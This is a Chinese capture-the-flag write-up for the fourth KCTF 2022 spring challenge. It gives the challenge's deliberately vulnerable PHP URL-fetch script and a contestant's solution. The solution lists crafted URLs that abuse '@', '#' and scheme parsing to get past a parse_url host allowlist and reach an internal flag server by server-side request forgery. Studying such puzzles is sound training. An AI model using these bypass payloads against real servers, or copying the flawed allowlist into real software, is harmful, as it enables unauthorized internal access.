出题团队简介
赛题设计思路
<?php
function curl_request($url, $data=null, $method='get', $header = array("content-type: application/json"), $https=true, $timeout = 5){
$method = strtoupper($method);
$ch = curl_init();//初始化
curl_setopt($ch, CURLOPT_URL, $url);//访问的URL
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);//只获取页面内容,但不输出
if($https){
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);//https请求 不验证证书
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);//https请求 不验证HOST
}
if ($method != "GET") {
if($method == 'POST'){
curl_setopt($ch, CURLOPT_POST, true);//请求方式为post请求
}
if ($method == 'PUT' || strtoupper($method) == 'DELETE') {
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method); //设置请求方式
}
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);//请求数据
}
curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_HTTPHEADER, $header); //模拟的header头
//curl_setopt($ch, CURLOPT_HEADER, false);//设置不需要头信息
$result = curl_exec($ch);//执行请求
curl_close($ch);//关闭curl,释放资源
return $result;
}
$url=$_GET["url"];
$uu=parse_url($url);
$host=isset($uu["host"])?$uu["host"]:"";
$scheme=isset($uu["scheme"])?$uu["scheme"]:"";
if(empty($host)){
die("host is null");
}
if(empty($scheme)){
die("scheme is null");
}
//https://ctf.pediy.com/upload/team/762/team236762.png?
if($host=="ctf.pediy.com"||$host=="127.0.0.1"||$host=="localhost"){
//echo curl_request("http://123.57.254.42/flag.php","get",[],true,5);//get flag
echo curl_request($url,'',"get",[],true,5);
}else{
die("host not allow");
}
?>
赛题解析
本赛题解析由看雪论坛会员 KEEEY 给出:
<!--phpinfo.php-->
<img src="url.php?url=https://ctf.pediy.com/upload/team/762/team236762.png">
/phpinfo.php
/url.php?url=
http://121.36.145.157:8044/url.php -> 返回200
http://121.36.145.157:8044/urL.php -> 返回404
//echo curl_request("http://123.57.254.42/flag.php","get",[],true,5);//get flag
http://u:p@123.57.254.42@127.0.0.1/
http://123.57.254.42#@127.0.0.1/
http://123.57.254.42{%00-%FF}{%00-%FF}127.0.0.1/
http://123.57.254.42{%00-%FF}127.0.0.1{%00-%FF}
...
scheme://user:pass@host:port/path?query
123.57.254.42://127.0.0.1
123.57.254.42://127.0.0.1/../flag.php
scheme
host
../flag.php -> path
host
/127.0.0.1/../flag.php -> path
第五题《危机四伏》正在进行中,
球分享
球点赞
球在看
原文始发于微信公众号(看雪学苑):看雪2022 KCTF 春季赛 | 第四题设计思路及解析